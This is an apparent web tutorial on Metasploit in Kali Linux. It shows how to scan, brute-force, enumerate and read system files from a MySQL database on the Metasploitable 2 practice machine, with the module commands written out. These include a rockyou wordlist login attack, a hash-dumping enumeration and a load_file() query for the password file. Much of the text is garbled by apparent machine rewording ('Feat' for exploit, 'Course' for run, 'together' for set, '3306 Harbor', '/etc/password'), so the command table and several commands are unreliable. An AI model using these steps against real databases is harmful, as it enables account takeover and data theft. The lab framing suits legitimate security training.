Database examples

Beginner’s Guide to Metasploit in Kali Linux (with Practical Examples)

Kali Linux is pre-equipped with all the necessary tools for penetration testing. One such tool is the Metasploit framework which enables red teams to perform vulnerability reconnaissance, analysis, enumeration and exploitation for all types of applications, networks, servers, operating systems and platforms.

Even though the core functionality of Metasploit focuses on pre- and post-exploit penetration testing tasks, it is also useful in developing exploits and finding vulnerabilities.

This article introduces the main components of the Metasploit framework. It demonstrates how to use Metasploit modules for analysis, enumeration, and exploitation of a vulnerable MySQL database hosted on a machine known as Metasploitable 2.


Metasploit is the most commonly used pentesting tool that comes pre-installed in Kali Linux. The main components of Metasploit are msfconsole and the modules it offers.

What is msfconsole?

msfconsole is the most commonly used all-in-one shell-like interface that lets you access all of Metasploit’s features. It supports Linux-like command line as it offers command auto-completion, tabbing and other bash shortcuts.

This is the main interface that will allow you to work with Metasploit modules to analyze and launch an attack on the target machine.

Metasploit Modules

Metasploit has small code snippets that enable its core functionality. However, before explaining the modules, you should be clear about the following recurring concepts:

USE VIDEO OF THE DAY
  • Vulnerability: This is a flaw in the target’s design or code that makes it vulnerable to exploitation leading to the disclosure of confidential information.
  • Feat: A code that exploits the vulnerability found.
  • Payload: This is code that helps you achieve the goal of exploiting a vulnerability. It runs inside the target system to access target data, such as maintaining access through Meterpreter or reverse shell.

Now let’s move on to the five main modules of Metasploit:

  • Auxiliary: The auxiliary module contains a set of programs such as fuzzers, scanners and SQL injection tools to collect information and deepen the understanding of the target system.
  • Encoders: Encoders encrypt payloads/exploits to protect against signature-based antivirus solutions. Since payloads or exploits contain null or incorrect characters, there is a high chance that they will be detected by an antivirus solution.
  • Feat: As stated earlier, an exploit is code that exploits targeted vulnerabilities to ensure system access via payloads.
  • Payload: As mentioned earlier, payloads help you achieve the desired goal of attacking the target system. This means that they will either help you get an interactive shell or maintain a backdoor, execute a command or load malware, etc. Metasploit offers two types of payloads: stepless payloads and staged payloads.
  • To post: The post-operation module will help you gather more information about the system. For example, it can help you dump password hashes and search user credentials for lateral movement or privilege escalation.


You can use the following commands to display each module and its categories:

cd /usr/share/metasploit-framework/modules
ls
tree -L 1 module-name/

Load Msfconcole Modules

To start using the Metasploit interface, open the Kali Linux terminal and type msfconsole.

By default, msfconsole opens with a banner; to remove this and start the interface silently, use the msfconsole order with the -q flag.


msfconcole

The interface looks like a Linux command line shell. Some supported Linux Bash commands are ls, clear, grep, history, jobs, kill, cd, exit, etc.

Type to help or a question mark”?to see the list of all available commands that you can use in msfconsole. Some of the most important ones that we will use in this article are:

Order The description
to look for Allows you to search Metasploit database based on given protocol/application/parameter
use Allows you to choose a particular module and change the context to module-specific commands
information Provides information about the selected module
Pin up Displays information about the given module name and current module options
Check Checks if the target system has a vulnerability
together It is a context-specific variable that configures the options for the current module
not defined Deletes previously defined settings
Course Execute the current module

Before you begin, configure the Metasploit database by starting the PostgreSQL server and initializing the msfconsole database as follows:

systemctl start postgresql
msfdb init

Now check the status of the database by initializing msfconsole and running the db_status order.

For demonstration purposes, configure the open source vulnerable Linux machine Metasploitable2.

MySQL discovery with msfconsole

First find the IP address of the Metasploitable machine. Then use the db_nmap command in msfconsole with Nmap flags to scan MySQL database at 3306 Harbor.

db_nmap -sV -sC -p 3306 

You can run the regular nmap -p- command to confirm the MySQL database port number.


Msfconcole dbnmap parsing

Related: Nmap for Beginners: Get Hands-on Experience with Port Scanning

Use the to look for option to find an auxiliary module to analyze and enumerate the MySQL database.

search type:auxiliary mysql

msfconcole auxiliary module

In the list above, you can use the auxiliary/scanner/mysql/mysql_version module by entering the module name or associated number to parse the version details of MySQL.

use 11

Or:

use auxiliary/scanner/mysql/mysql_version

Now use the show options command to display the parameters needed to run the current module:


msfconcole auxiliary scan

The output shows that the only option required and not set is RHOSTS which is the IP address of the target machine. Use the set rhosts to set the parameter and run the module, as follows:


MYSQL version of msfconsole

The output shows similar MySQL version details as db_nmap a function.

Bruteforce MySQL root account with msfconsole

After the scan, you can also brute force the MySQL root account via Metasploit helper(scanner/mysql/mysql_login) module.


msfconcole password file

You will need to set the PASS_FILE parameter to the path of the list of words available inside /usr/share/wordlists:

set PASS_FILE /usr/share/wordlistss/rockyou.txt

Next, specify the IP address of the target machine with the RHOSTS command.

set RHOSTS 

Together BLANK_PASSWORDS to true if no password is defined for the root account.

set BLANK_PASSWORDS true

Finally, run the module by typing Course in the airport.


msfconcole root password

MySQL enumeration with msfconsole

msfconsole also allows you to enumerate the database using the auxiliary (admin/mysql/mysql_enum) module. It returns all accounts with details such as associated privileges and password hashes.

To do this, you will need to specify the password, username and rhosts variable.

set password ""
set username root
set rhosts


msfconcole enumeration root

Finally, launch the module by typing:

run

msfconcole-MySQL-Enumeration-Detail

Exploiting MySQL with msfconsole

From the enumeration phase, it is clear that the root account has file privileges that allow an attacker to run the load file() a function. The function makes it possible to exploit the MySQL database by loading all the data from the /etc/password file via the auxiliary(/admin/mysql/mysql_sql) module:

Again, set username, password and rhosts variable. Then run a query that invokes the load_file() function and loads the /etc/passwd to file.

set sql select load_file("/etc/password")

msfconcole Load file

Metasploit modules help in all phases of penetration testing. Metasploit also allows users to create their own modules.

This article summarizes some core modules of the Metasploit framework and shows how to parse, enumerate, and mine a MySQL database on the Metasploitable 2 machine.

Metasploit isn’t the only penetration testing tool you’ll use as a cybersecurity professional. There are several other utilities you will need to become familiar with if you want to become a security expert.


Woman working on laptop
The 10 Best Penetration Testing Tools for Security Professionals

If you’re wondering how the pros test penetration, this guide will help.

Read more


About the Author